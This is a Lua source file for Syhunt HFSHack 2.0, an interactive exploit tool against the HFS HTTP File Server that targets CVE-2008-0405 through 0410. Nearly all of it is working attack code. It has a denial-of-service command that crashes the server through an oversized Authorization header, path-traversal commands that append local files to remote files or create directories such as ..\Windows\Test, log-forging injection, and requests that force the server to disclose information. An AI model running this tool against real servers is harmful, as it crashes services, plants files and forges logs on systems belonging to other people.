require('Gelo')
--[[
----------------------------------------------------------------
Syhunt HFSHack 2.0 by Felipe M. Aragon
----------------------------------------------------------------
* CVE-2008-0409 - Cross-Site Scripting (XSS) and Host Field XSS
* CVE-2008-0410 - Information Disclosure Vulnerability
Affected Versions: HFS 2.0 to and including 2.3(Beta Build 174)
http://www.syhunt.com/advisories/hfs-1-template.txt

* CVE-2008-0405 - Arbitrary File/Folder Creation Vulnerability
* CVE-2008-0406 - Denial of Service (DoS) Vulnerability
Affected Versions: HFS 2.2 to and including 2.3(Beta Build 174)
http://www.syhunt.com/advisories/hfs-1-log.txt

* CVE-2008-0407 - Username Spoofing Vulnerability
* CVE-2008-0408 - Log Forging / Injection Vulnerability
Affected Versions: HFS 1.5g to and including 2.3(Beta Build
174); and possibly HFS version 1.5f
http://www.syhunt.com/advisories/hfs-1-username.txt

Vulnerabilities found by Syhunt (http://www.syhunt.com)
Sandcat can also identify these issues:
http://www.syhunt.com/sandcat
--]]

about = [[
----------------------------------------------------------------
 Syhunt HFSHack 2.0
----------------------------------------------------------------

This exploit tool should be used only by system administrators
(or other people in charge).

Type "readme" and read the text before continuing

If you have already read it, type "help" to view a list of
commands.
]]

readme = [[
(c) 2010 Syhunt Cyber-Security Company. All rights reserved.

This tool is provided "as-is", without any expressed or implied
warranty. In no event will the author be held liable for any
damages arising from the use of this tool.
Permission is granted to anyone to use this tool, and to alter
it and redistribute it freely, subject to the following
restrictions:
1. The origin of this tool must not be misrepresented, you must
   not claim that you wrote the original tool.
2. Altered source versions must be plainly marked as such, and
   must not be misrepresented as being the original tool.
3. This notice may not be removed or altered from any source
   distribution.
If you have any questions concerning this license, please email
contact _at_ syhunt _dot_ com
]]

help = [[
open [hostname]
	This should be called first (unless you want the default host as target host)
checkdos
	Performs the Log DoS Attack (Makes the server crash)
checkxss
	Checks for the presence of the Template XSS Vulnerability
manipf [localfilename] [remotefilename]
	Appends content of a local file to a remote file. Examples:
	manipf inject.html index.html or ..\\..\index.html
	Note: If the file does not exists, it will be created.
maniplog [localfilename]
	Injects content of a local file to the HFS log panel and file
mkd [dirname]
	Creates directories. Examples:
	mkd Test or ..\\..\\Windows\\Test
symbols
	Forces HFS to reveal details about the server
ver
	Forces HFS to show its version and build, and displays which
	HFSHack commands are available for it
quit
	Exits this application
]]

noversion = [[
No version information found.
The "Send HFS identifier" option is probably disabled.
Trying to force HFS to display its version...
]]

host = "127.0.0.1" -- Default Host
path = "/" -- Default Path
http = GHTTPRequest:new()

-- Affected Versions
re_200801161 = "^HFS(.*?)(2.[0-1]|2.2$|2.2[a-b]|2.3 beta)"
re_200801162 = "^HFS(.*?)(2.2$|2.2[a-b]|2.3 beta)"
re_200801163 = "^HFS(.*?)(1.5[f-g]|1.6|2.[0-1]|2.2$|2.2[a-b]|2.3 beta)"
re_cangetver = "^HFS(.*?)(2.[0-1]|2.2$|2.2[a-b])"

function dorequest(path,authdata)
 local hdr = "GET "..path.." HTTP/1.1\n"
 hdr = hdr.."Connection: Keep-Alive\n"
 if authdata ~= "" then
  hdr = hdr.."Authorization: Basic "..authdata
 end
 http:openlow(host,80,hdr.."\n\n")
end

function getservinfo(symbol,desc)
 dorequest(path,base64_enc("<id>%"..symbol.."%</id>"))
 local id = (regex_find(http.text,"<id>(.*?)</id>"))
 id = html_gettagcontent(id,"id")
 if id ~= "" then
  if desc ~= "" then
   print(desc..": "..id)
  end
 end
 return id
end

function show_ver()
 function testforcmds(regex,cmds)
  if regex_match(sw,regex) then
   return cmds
  else
   return ""
  end
 end
  force = true
  sw = http:rcvdheader("Server") 
  print("Server: "..sw)
  if sw == "" then
   print(noversion)
  else
    if str_beginswith(sw,"HFS") then
     force = regex_match(sw,re_cangetver)
    else
     print("Not running HFS!")
     force = false
    end
  end
  if force then
   local ver = getservinfo("version","HFS version number")
   local build = getservinfo("build","HFS build number")
   sw = "HFS "..ver.." "..build
  end
  print("Available commands for this server:")
  local c = ""
  c = c..testforcmds(re_200801161,"checkxss symbols ver")
  c = c..testforcmds(re_200801162," manipf mkd checkdos")
  c = c..testforcmds(re_200801163," maniplog")
  if c == "" then
   c = "None (This server is not vulnerable)"
  end
  print(" "..c)
end

function host_ver()
   http:open("GET","http://"..host)
   if http.error == 0 then
    print("Connected.")
    show_ver()
   else
    print("Failed: ["..http.error.."] "..http.errordesc)
   end
end

function host_open(h)
   if (h == "") then
    print("No target info provided. Using localhost") else host = h
   end
   host_ver()
end

function host_symbols()
 host_ver()
 print("Forcing HFS to reveal more details...")
 local s = {} -- Extra Details to Obtain
 s["connections"]="Current number of connections to HFS"
 s["timestamp"]="Date and time of the server"
 s["uptime"]="Uptime"
 s["speed-out"]="Current outbound speed"
 s["speed-in"]="Current inbound speed"
 s["total-out"]="Total amount of bytes sent"
 s["total-downloads"]="Total amount of bytes sent"
 s["total-hits"]="Total Hits"
 s["total-uploads"]="Total Uploads"
 s["number-addresses"]="Current number of connected clients (IPs)"
 s["number-addresses-ever"]="Number of unique IPs ever connected"
 s["number-addresses-downloading"]="Current number of downloading clients (IPs)"
 for symbol,desc in pairs(s) do getservinfo(symbol,desc) end
end

function host_manip(s)
  if str_beginswith(s,"maniplog") then
   local f = file_gettostr(str_after(s," "))
   dorequest(path,base64_enc(f))
   print("Sent.")
  end
  if str_beginswith(s,"manipf") then
   local lf = file_gettostr(str_gettoken(s," ",2))
   lf = str_replace(lf,string.char(13,10),"%0a")
   local rf = file_gettostr(str_gettoken(s," ",3))
   dorequest("/?%0a"..lf,base64_enc("\\..\\"..rf).."AA")
   print("Sent.")
  end 
end

function host_check(s)
 if str_beginswith(s,"checkxss") then 
   local ver = getservinfo("version","")
   if ver == "" then
    print("Not Vulnerable") else print("Vulnerable")
   end
  end
  if str_beginswith(s,"checkdos") then 
   dorequest(path,base64_enc(string.rep("a",270)..":")) -- same as "a*270:"
   print("DoS executed.")
   dorequest(path,"")
   if http.error == 0 then
    print("Not Vulnerable (Host is still up)") else print("Vulnerable (Host is now down)")
   end
  end
end

print(about)
while (true) do
 local s = io.read()
 if (s == "") then s = "help" end
 if str_beginswith(s,"mkd") then
  dorequest(path,base64_enc("\\..\\"..str_after(s," ").."\\").."AA")
  print("Sent.")
 end
 if str_beginswith(s,"manip") then host_manip(s) end
 if str_beginswith(s,"check") then host_check(s) end
 if str_beginswith(s,"open") then host_open(str_after(s," ")) end
 if (s == "readme") then print(readme) end
 if (s == "help") then print(help) end
 if (s == "ver") then host_ver() end
 if (s == "symbols") then host_symbols() end
 if (s == "quit") then print("Bye!") break end
end